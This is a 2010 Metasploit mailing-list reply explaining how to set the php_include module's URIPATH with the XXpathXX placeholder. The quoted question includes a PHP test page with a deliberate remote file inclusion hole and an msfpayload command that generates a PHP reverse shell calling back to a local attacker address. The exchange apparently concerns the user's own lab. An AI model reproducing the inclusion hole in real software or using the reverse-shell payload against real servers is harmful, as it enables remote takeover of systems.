metasploit-framework July 2010 archive
Main Archive Page > Month Archives  > metasploit-framework archives
metasploit-framework: Re: [framework] php_include confusion

Re: [framework] php_include confusion

From: HD Moore <hdm_at_nospam>
Date: Tue Jul 13 2010 - 03:18:12 GMT
To: framework@spool.metasploit.com

On 7/12/2010 6:07 PM, Jeffs wrote:
> index_test.php looks like this:
>
> <html>
> <body>
> <? require $_GET['include'] ?>
> </body>
> </html>
>
>
> and include.php.txt was created properly with msfpayload as such.
>
> ./msfpayload php/reverse_php LHOST=192.168.1.101 R >
> /var/www/include.php.txt
>
> Both files on the are the web server in the proper directories.
>
> If someone could clarify the XXpathXX value for me that would be greatly
> appreciated.

In this case:

msf> set URIPATH http://server/index.php?include=XXpathXX

The moduel will replace XXpathXX with
http://your_host:random_port/random_uri.php which handle the rest.
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework